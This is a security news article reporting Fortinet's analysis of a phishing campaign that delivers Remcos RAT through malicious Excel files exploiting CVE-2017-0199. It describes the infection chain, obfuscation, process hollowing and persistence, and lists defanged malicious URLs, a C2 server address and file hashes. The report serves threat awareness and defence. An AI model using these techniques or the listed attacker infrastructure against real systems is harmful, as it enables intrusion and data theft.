Hackers exploit Excel documents due to their popularity and built-in vulnerabilities. With VBA macros now blocked by default, they have turned to using “.XLL” files to deliver malware.
Hackers Use Malicious Excel Files to Deliver Remcos RAT
Fortinet researchers recently found that hackers are targeting Windows users with malicious Excel files to deploy Remcos RAT. FortiGuard Labs identified one such phishing attack when they received an email containing an Excel file disguised as an order document.
When opened, the document exploits the Microsoft Office Remote Code Execution vulnerability (CVE-2017-0199) to download an HTA (HTML Application) file via a short URL, which redirects to “hxxp://192[.]3[.]220[.]22/xampp/en/cookienetbookinetcahce.hta.” The Windows application mshta.exe then executes the HTA file, using JavaScript, VBScript, Base64 encoding, URL encoding, and PowerShell scripts to conceal information under layers of obfuscation.
The HTA file downloads an executable named “dllhost.exe” into the %AppData% directory using the URLDownloadToFile() API.
When executed, dllhost.exe extracts files into %AppData%\intercessionate\Favourablies117\sulfonylurea and starts a 32-bit PowerShell process that reads and executes obfuscated code from Aerognosy.Res using Invoke-Expression (iEx). The final payload, Remcos—a commercial RAT often misused by threat actors—enables remote control and data theft from victims’ computers.
The report states that the malware gains persistence by copying dllhost.exe to %temp% as “Vaccinerende.exe,” hiding the PowerShell process, and loading malicious code from “Valvulate.Cru” directly into memory using VirtualAlloc() and CallWindowProcA() APIs, ultimately securing full remote control over the system.
The malware uses a multi-stage attack chain starting with PowerShell exploitation, implementing advanced anti-analysis techniques, such as:
- Self-decrypting code blocks wrapped in redundant instructions
- Vectored exception handlers to hinder debugging
- Dynamic API resolution via PEB access at fs:[30h]
- Anti-debugging checks, like ThreadHideFromDebugger (0x11) and ProcessDebugPort monitoring
The malware then employs process hollowing by creating a suspended instance of “Vaccinerende.exe” (derived from “dllhost.exe”) using the CREATE_SUSPENDED flag. It leverages APIs like NtAllocateVirtualMemory and NtMapViewOfSection to load malicious code. To persist, it creates a key in the Auto_Run registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
The malware retrieves and decodes an encrypted Remcos RAT variant (5.1.2 Pro) from hxxp://192[.]3[.]220[.]22/hFXELFSwRHRwqbE214.bin using the “NtCreateThreadEx” BIOS function. This version of Remcos uses packed packets with a command ID, containing system files and command data for the C&C server at 107[.]173[.]4[.]16:2404. It enables remote control features like keylogging, screenshots, and process manipulation via a configuration block in “SETTINGS.”
IOCs
URLs:
hxxps://og1[.]in/2Rxzb3
hxxp://192[.]3[.]220[.]22/xampp/en/cookienetbookinetcahce.hta
hxxp://192[.]3[.]220[.]22/hFXELFSwRHRwqbE214.bin
hxxp://192[.]3[.]220[.]22/430/dllhost.exe
C2 server:
107[.]173[.]4[.]16:2404
Relevant Sample SHA-256:
[PO-9987689987.xls]
4A670E3D4B8481CED88C74458FEC448A0FE40064AB2B1B00A289AB504015E944
[cookienetbookinetcahce.hta]
F99757C98007DA241258AE12EC0FD5083F0475A993CA6309811263AAD17D4661
[dllhost.exe / Vaccinerende.exe]
9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
[Aerognosy.Res]
D4D98FDBE306D61986BED62340744554E0A288C5A804ED5C924F66885CBF3514
[Valvulate.Cru]
F9B744D0223EFE3C01C94D526881A95523C2F5E457F03774DD1D661944E60852
[Remcos / Decrypted hFXELFSwRHRwqbE214.bin]
24A4EBF1DE71F332F38DE69BAF2DA3019A87D45129411AD4F7D3EA48F506119D
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Leave A Comment